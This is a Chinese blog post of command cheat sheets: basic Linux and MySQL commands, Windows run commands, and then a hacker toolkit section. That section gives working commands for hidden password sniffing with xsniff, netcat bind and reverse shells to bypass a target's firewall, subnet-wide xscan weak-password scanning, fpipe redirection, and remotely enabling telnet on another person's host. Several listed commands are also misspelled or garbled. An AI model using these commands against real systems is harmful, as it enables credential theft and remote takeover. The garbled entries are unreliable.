【Cmd】那些年,我们迷恋的cmd命令(二)
Linux系统下基本命令
-
Linux系统下基本命令: 要区分大小写
-
uname 显示版本信息(同win2K的 ver)
-
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
-
pwd 查询当前所在的目录位置
-
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
-
cat 文件名 查看文件内容
-
cat >abc.txt 往abc.txt文件中写上内容。
-
more 文件名 以一页一页的方式显示一个文本文件。
-
cp 复制文件
-
mv 移动文件
-
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
-
mkdir 目录名 建立目录
-
rmdir 删除子目录,目录内没有文档。
-
chmod 设定档案或目录的存取权限
-
grep 在档案中查找字符串
-
diff 档案文件比较
-
find 档案搜寻
-
date 现在的日期、时间
-
who 查询目前和你使用同一台机器的人以及Login时间地点
-
w 查询目前上机者的详细资料
-
whoami 查看自己的帐号名称
-
groups 查看某人的Group
-
passwd 更改密码
-
history 查看自己下过的命令
-
ps 显示进程状态
-
kill 停止某进程
-
gcc 黑客通常用它来编译C语言写的文件
-
su 权限转换为指定使用者
-
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
-
ftp ftp连接上某服务器(同win2K)
MYSQL命令
-
MYSQL 命令:
-
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
-
(例:mysql -h110.110.110.110 -Uroot -P123456
-
注:u与root可以不用加空格,其它也一样)
-
exit 退出MYSQL
-
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
-
grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
-
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
-
use mysql;
-
show tables; 显示库中的数据表
-
describe 表名; 显示数据表的结构
-
create database 库名; 建库
-
use 库名;
-
create table 表名 (字段设定列表); 建表
-
drop database 库名;
-
drop table 表名; 删库和删表
-
delete from 表名; 将表中记录清空
-
select * from 表名; 显示表中的记录
-
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
-
win2003系统下新增命令(实用部份):
-
shutdown /参数 关闭或重启本地或远程主机。
-
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
-
例:shutdown /r /t 0 立即重启本地主机(无延时)
-
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
-
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
-
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
-
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
计算机运行命令全集
-
计算机运行命令全集 winver---------检查Windows版本
-
wmimgmt.msc----打开windows管理体系结构
-
wupdmgr--------windows更新程序
-
winver---------检查Windows版本
-
wmimgmt.msc----打开windows管理体系结构
-
wupdmgr--------windows更新程序
-
wwww--------windows脚本宿主设置
-
write----------写字板winmsd-----系统信息
-
wiaacmgr-------扫描仪和照相机向导
-
winchat--------XP自带局域网聊天
-
mem.exe--------显示内存使用情况
-
Msconfig.exe---系统配置实用程序
-
mplayer2-------简易widnows media player
-
mspaint--------画图板
-
mstsc----------远程桌面连接
-
mplayer2-------媒体播放机
-
magnify--------放大镜实用程序
-
mmc------------打开控制台
-
mobsync--------同步命令
-
dxdiag---------检查DirectX信息
-
drwtsn32------ 系统医生
-
devmgmt.msc--- 设备管理器
-
dfrg.msc-------磁盘碎片整理程序
-
diskmgmt.msc---磁盘管理实用程序
-
dcomcnfg-------打开系统组件服务
-
ddeshare-------打开DDE共享设置
-
dvdplay--------DVD播放器
-
net stop messenger-----停止信使服务
-
net start messenger----开始信使服务
-
notepad--------打开记事本
-
nslookup-------网络管理的工具向导
-
ntbackup-------系统备份和还原
-
narrator-------屏幕"讲述人"
-
ntmsmgr.msc----移动存储管理器
-
ntmsoprq.msc---移动存储管理员操作请求
-
netstat -an----(TC)命令检查接口
-
syncapp--------创建一个公文包
-
sysedit--------系统配置编辑器
-
sigverif-------文件签名验证程序
-
sndrec32-------录音机
-
shrpubw--------创建共享文件夹
-
secpol.msc-----本地安全策略
-
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
-
services.msc---本地服务设置
-
Sndvol32-------音量控制程序
-
sfc.exe--------系统文件检查器
-
sfc /scannow---windows文件保护
-
tsshutdn-------60秒倒计时关机命令
-
tourstart------xp简介(安装完成后出现的漫游xp程序)
-
taskmgr--------任务管理器
-
eventvwr-------事件查看器
-
eudcedit-------造字程序
-
explorer-------打开资源管理器
-
packager-------对象包装程序
-
perfmon.msc----计算机性能监测程序
-
progman--------程序管理器
-
regedit.exe----注册表
-
rsop.msc-------组策略结果集
-
regedt32-------注册表编辑器
-
rononce -p ----15秒关机
-
regsvr32 /u *.dll----停止dll文件运行
-
regsvr32 /u zipfldr.dll------取消ZIP支持
-
cmd.exe--------CMD命令提示符
-
chkdsk.exe-----Chkdsk磁盘检查
-
certmgr.msc----证书管理实用程序
-
calc-----------启动计算器
-
charmap--------启动字符映射表
-
cliconfg-------SQL SERVER 客户端网络实用程序
-
Clipbrd--------剪贴板查看器
-
conf-----------启动netmeeting
-
compmgmt.msc---计算机管理
-
cleanmgr-------**整理
-
ciadv.msc------索引服务程序
-
osk------------打开屏幕键盘
-
odbcad32-------ODBC数据源管理器
-
oobe/msoobe /a----检查XP是否激活
-
lusrmgr.msc----本机用户和组
-
logoff---------注销命令
-
iexpress-------木马捆绑工具,系统自带
-
Nslookup-------IP地址侦测器
-
fsmgmt.msc-----共享文件夹管理器
-
utilman--------辅助工具管理器
-
gpedit.msc-----组策略
命令行方式嗅探器
-
命令行方式嗅探器xsniff
-
:
-
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
-
参数说明
-
-tcp 输出TCP数据报
-
-udp 输出UDP数据报
-
-icmp 输出ICMP数据报
-
-pass 过滤密码信息
-
-hide 后台运行
-
-host 解析主机名
-
-addr IP地址 过滤IP地址
-
-port 端口 过滤端口
-
-log 文件名 将输出保存到文件
-
-asc 以ASCII形式输出
-
-hex 以16进制形式输出
-
用法示例
-
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
-
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
瑞士军刀
-
瑞士军刀:nc.exe
-
参数说明:
-
-h 查看帮助信息
-
-d 后台模式
-
-e prog程序重定向,一但连接就执行[危险]
-
-i secs延时的间隔
-
-l 监听模式,用于入站连接
-
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-
-n IP地址,不能用域名
-
-o film记录16进制的传输
-
-p[空格]端口 本地端口号
-
-r 随机本地及远程端口
-
-t 使用Telnet交互方式
-
-u UDP模式
-
-v 详细输出,用-vv将更详细
-
-w数字 timeout延时间隔
-
-z 将输入,输出关掉(用于扫锚时)
-
基本用法:
-
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
-
nc -l -p 80 开启本机的TCP 80端口并监听
-
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
-
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
-
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
-
高级用法:
-
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
-
nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
-
nc -L -p 80 <c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
-
type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
-
本机上用:nc -l -p 本机端口
-
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
-
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
-
本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
-
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
-
备 注:
-
| 管道命令
-
< 或 > 重定向命令。“<”,例如:tlntadmn <test.txt 指把test.txt的内容赋值给tlntadmn命令
-
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中
-
>与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。
-
如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
扫描工具
-
扫描工具:xscan
-
基本格式
-
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
-
xscan -file <主机列表文件名><检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
-
检测项目
-
-active 检测主机是否存活
-
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-
-port 检测常用服务的端口状态
-
-ftp 检测FTP弱口令
-
-pub 检测FTP服务匿名用户写权限
-
-pop3 检测POP3-Server弱口令
-
-smtp 检测SMTP-Server漏洞
-
-sql 检测SQL-Server弱口令
-
-smb 检测NT-Server弱口令
-
-iis 检测IIS编码/解码漏洞
-
-cgi 检测CGI漏洞
-
-nasl 加载Nessus攻击脚本
-
-all 检测以上所有项目
-
其它选项
-
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-
-l 显示所有网络适配器
-
-v 显示详细扫描进度
-
-p 跳过没有响应的主机
-
-o 跳过没有检测到开放端口的主机
-
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
-
用法示例
-
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
-
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
-
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
其它
-
Shutdown.exe
-
Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)
-
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
-
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息
-
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
-
OpenTelnet.exe (远程开启telnet工具)
-
opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。
-
NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。
-
ResumeTelnet.exe (OpenTelnet附带的另一个工具)
-
resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。
本文出自 “成鹏致远” 博客,请务必保留此出处http://infohacker.blog.51cto.com/6751239/1171491